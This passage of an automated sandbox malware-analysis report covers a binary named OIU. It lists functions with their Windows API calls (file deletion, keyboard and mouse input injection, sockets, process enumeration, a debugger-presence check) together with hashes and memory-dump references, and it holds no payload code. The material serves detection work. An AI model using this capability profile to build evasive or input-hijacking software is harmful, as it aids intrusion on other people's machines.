                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongProcWindow
                                                                      • String ID: 6ofs
                                                                      • API String ID: 3131106179-1294211291
                                                                      • Opcode ID: fe8b2a339154643637665efcbe1d7354795d5b8cc2576794eb5fbe88edefa66e
                                                                      • Instruction ID: 08d8552b83f8e61b78d8ddf24e6a9fdc02ec759dc16b86ca96e40d021371e809
                                                                      • Opcode Fuzzy Hash: fe8b2a339154643637665efcbe1d7354795d5b8cc2576794eb5fbe88edefa66e
                                                                      • Instruction Fuzzy Hash: 50A1E070258408AFE728AA2D8C99EFF3ADDDB42340F2502C9F702D7691CEA59D45D372
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDB952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _free.LIBCMT ref: 00BDB9D4
                                                                      • _free.LIBCMT ref: 00BDB9F8
                                                                      • _free.LIBCMT ref: 00BDBB7F
                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00C43700), ref: 00BDBB91
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00C7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00BDBC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00C71270,000000FF,?,0000003F,00000000,?), ref: 00BDBC36
                                                                      • _free.LIBCMT ref: 00BDBD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 314583886-0
                                                                      • Opcode ID: 278a3c267ecf761011aabe8a9f46410810fd6d6627e6e871b04105397b2c56c5
                                                                      • Instruction ID: 1cc9f0df43921ccba9589d5f0ba043ad375cb00469ae1b93c480fb39d9fd963f
                                                                      • Opcode Fuzzy Hash: 278a3c267ecf761011aabe8a9f46410810fd6d6627e6e871b04105397b2c56c5
                                                                      • Instruction Fuzzy Hash: 0EC11375A04245EFCB249F698851FAEFBE8EF41360F1A41EBE89497352FB308E419750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                                        • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C0D420
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D470
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0D481
                                                                      • FindClose.KERNEL32(00000000), ref: 00C0D498
                                                                      • FindClose.KERNEL32(00000000), ref: 00C0D4A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: b84687bd24e4a94ed647567bad68014d77eee28653fb7b7afab39fbdced2a402
                                                                      • Instruction ID: d026d12556c35a264308cfb25204968efa8b8961bb9e80d884920b7757929493
                                                                      • Opcode Fuzzy Hash: b84687bd24e4a94ed647567bad68014d77eee28653fb7b7afab39fbdced2a402
                                                                      • Instruction Fuzzy Hash: 97317A7101C3419BC300EFA4D8919AFB7E8AE92340F444A5DF4E293191EB34AA09DB63
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BDE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 3bf9c707b03175e0bbf5423fd7963f70d2b4091d6c2f171ccf27f9d4eefdf9ae
                                                                      • Instruction ID: 8884a215ee60958b4e5e4632c6faf76e1395321a925096e4abbc434c245a4816
                                                                      • Opcode Fuzzy Hash: 3bf9c707b03175e0bbf5423fd7963f70d2b4091d6c2f171ccf27f9d4eefdf9ae
                                                                      • Instruction Fuzzy Hash: 9CC22771E086298BDB25DE289D807EAB7F5EB48305F1441EBD85EE7340E775AE818F40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C164DC
                                                                      • CoInitialize.OLE32(00000000), ref: 00C16639
                                                                      • CoCreateInstance.OLE32(00C3FCF8,00000000,00000001,00C3FB68,?), ref: 00C16650
                                                                      • CoUninitialize.OLE32 ref: 00C168D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                      • String ID: .lnk
                                                                      • API String ID: 886957087-24824748
                                                                      • Opcode ID: e11cbf9af3e38dba76dba4ecaa87e110d54e593fa92f4210d965a7f66b7eb820
                                                                      • Instruction ID: 16ff351823bc8b19979b4bf50c8659a57a2642ab7f2deb26f138635589f7083d
                                                                      • Opcode Fuzzy Hash: e11cbf9af3e38dba76dba4ecaa87e110d54e593fa92f4210d965a7f66b7eb820
                                                                      • Instruction Fuzzy Hash: 13D15971508201AFC314EF24C881EABB7E9FF96704F00496DF5958B291EB71EA49CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C222DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 00C222E8
                                                                        • Part of subcall function 00C1E4EC: GetWindowRect.USER32(?,?), ref: 00C1E504
                                                                      • GetDesktopWindow.USER32 ref: 00C22312
                                                                      • GetWindowRect.USER32(00000000), ref: 00C22319
                                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00C22355
                                                                      • GetCursorPos.USER32(?), ref: 00C22381
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C223DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                      • String ID:
                                                                      • API String ID: 2387181109-0
                                                                      • Opcode ID: b97803fd062960866b6adb55ffb255831b1d9da701d8aa3e7f27ca1d17918889
                                                                      • Instruction ID: 2cde447ff8172e4ccfb51f25541d0be105b92defe26ff5ac4c5b29196bc6b696
                                                                      • Opcode Fuzzy Hash: b97803fd062960866b6adb55ffb255831b1d9da701d8aa3e7f27ca1d17918889
                                                                      • Instruction Fuzzy Hash: 3A31AD72504325ABD720DF55D849B9FBBADFF88314F000A19F995A7191DB34EA08CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C19B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C19B78
                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C19C8B
                                                                        • Part of subcall function 00C13874: GetInputState.USER32 ref: 00C138CB
                                                                        • Part of subcall function 00C13874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C13966
                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C19BA8
                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C19C75
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                      • String ID: *.*
                                                                      • API String ID: 1972594611-438819550
                                                                      • Opcode ID: 2a0eaf3ef250f88b435fc70ab497c01df8bc04ad0284ad503b14a86feaaa7b55
                                                                      • Instruction ID: 485559d7c1ee7fa79e2b5c560bf51a9c4e1cdbcae70e6b8ec142272f5e4cf491
                                                                      • Opcode Fuzzy Hash: 2a0eaf3ef250f88b435fc70ab497c01df8bc04ad0284ad503b14a86feaaa7b55
                                                                      • Instruction Fuzzy Hash: 8341717190420A9FCF14DF64C8A5AEEBBF8EF06310F144095E855A2191EB309F95DFA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C0AA57 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107keyboardwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00C0AAAC
                                                                      • SetKeyboardState.USER32(00000080), ref: 00C0AAC8
                                                                      • PostMessageW.USER32 ref: 00C0AB36
                                                                      • SendInput.USER32(00000001,?,0000001C), ref: 00C0AB88
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID: 7HR
                                                                      • API String ID: 432972143-1671487442
                                                                      • Opcode ID: 39697747b672f2a7a4e2c3654d866e9a0863bf1ef49676f92f297bf217055f3d
                                                                      • Instruction ID: fa06a0c98f7a387f8dbe845c1992b259a44244ed40f6b16a6da25a71f0cad8ae
                                                                      • Opcode Fuzzy Hash: 39697747b672f2a7a4e2c3654d866e9a0863bf1ef49676f92f297bf217055f3d
                                                                      • Instruction Fuzzy Hash: 9E312671A44318AFFF35CB69CC05BFE7BAAAB44310F04421AF1A1961D1D374CA81D762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BA8060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$y7HR
                                                                      • API String ID: 0-586130030
                                                                      • Opcode ID: b240b8b9fc52c54809b92568c643f7e85e2a3f818e1786163df22d3a61f891e1
                                                                      • Instruction ID: 0c89df2cd3f0ddf86cef32e174edf15bc2bbc42347eb5b88d696b2c5b3437c06
                                                                      • Opcode Fuzzy Hash: b240b8b9fc52c54809b92568c643f7e85e2a3f818e1786163df22d3a61f891e1
                                                                      • Instruction Fuzzy Hash: 69A26C70E0465ACBDF24CF59C8807AEB7F1FB55314F2481EAE816A7685EB709D81CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C21806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C2304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C2307A
                                                                        • Part of subcall function 00C2304E: _wcslen.LIBCMT ref: 00C2309B
                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C2185D
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21884
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00C218DB
                                                                      • WSAGetLastError.WSOCK32 ref: 00C218E6
                                                                      • closesocket.WSOCK32(00000000), ref: 00C21915
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 1601658205-0
                                                                      • Opcode ID: dd1de7b7b0c9995bc8a23c71607fbeef489faec4d6a169a1be7d983c54f2ab70
                                                                      • Instruction ID: 712dd442b65726a4c945c9e307d6d740e0618342f939140220bda0123638a11c
                                                                      • Opcode Fuzzy Hash: dd1de7b7b0c9995bc8a23c71607fbeef489faec4d6a169a1be7d983c54f2ab70
                                                                      • Instruction Fuzzy Hash: B951A271A00210AFDB10AF24D8C6F7A77E5AB45718F188498F919AF3D3C771AE418BA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C2A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00C2A6AC
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00C2A6BA
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00C2A79C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C2A7AB
                                                                        • Part of subcall function 00BBCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00BE3303,?), ref: 00BBCE8A
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                      • String ID:
                                                                      • API String ID: 1991900642-0
                                                                      • Opcode ID: ce08671b7ccb926df797ef2cb1aa3c92d0a21e873536a6593c78b6d7f685f480
                                                                      • Instruction ID: ac7b8419a7969f7121177d5dc921350dff8c6ea5c293e1fcc21d47ae928e4da3
                                                                      • Opcode Fuzzy Hash: ce08671b7ccb926df797ef2cb1aa3c92d0a21e873536a6593c78b6d7f685f480
                                                                      • Instruction Fuzzy Hash: 0E514DB1508310AFD710EF24D886A6FBBE8FF89754F00896DF59997291EB70D904CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C1CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00C1CE89
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C1CEEA
                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00C1CEFE
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                      • String ID:
                                                                      • API String ID: 234945975-0
                                                                      • Opcode ID: fcb845b3805826ff12294a91ae766fbb4b6aaaa05d2f7bf485d5d8bcb6ae8242
                                                                      • Instruction ID: 9ad6af8b2ec6e750906179d109e76193ed34f8cf9f1c5cec5caa798177baaaf1
                                                                      • Opcode Fuzzy Hash: fcb845b3805826ff12294a91ae766fbb4b6aaaa05d2f7bf485d5d8bcb6ae8242
                                                                      • Instruction Fuzzy Hash: EC21BD71540305ABDB30CFA5C988BABB7F8EF11314F10442EF566A2151E774EE85AB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C08298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C082AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: a7aa046ffba498e4d5ff625db1a84cd8dbb13d99ee401912a2efe7f69af2edb7
                                                                      • Instruction ID: 90b2ff4b3c162037edc6d9cc102aeb13c5c39479eccdf38abc9db09c3c88d1bb
                                                                      • Opcode Fuzzy Hash: a7aa046ffba498e4d5ff625db1a84cd8dbb13d99ee401912a2efe7f69af2edb7
                                                                      • Instruction Fuzzy Hash: 09322574A007059FCB28CF59C481A6AB7F1FF48710B15C56EE5AADB3A1EB70E941CB44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00C15C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C15CC1
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C15D17
                                                                      • FindClose.KERNEL32(?), ref: 00C15D5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 10e73f78b89c2686e341bfd42b8dcfa986d3aad4a08f8f98a1b71a9a67db2ed6
                                                                      • Instruction ID: 1c046a8a2bdf3da15263f5a339b286da1e62886ac0369e59f815134953d55f5c
                                                                      • Opcode Fuzzy Hash: 10e73f78b89c2686e341bfd42b8dcfa986d3aad4a08f8f98a1b71a9a67db2ed6
                                                                      • Instruction Fuzzy Hash: A951AA74604601DFC714DF28D494E9AB7E4FF8A314F14859DE96A8B3A1CB30ED44CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00BD2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00BD271A
                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00BD2724
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00BD2731
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
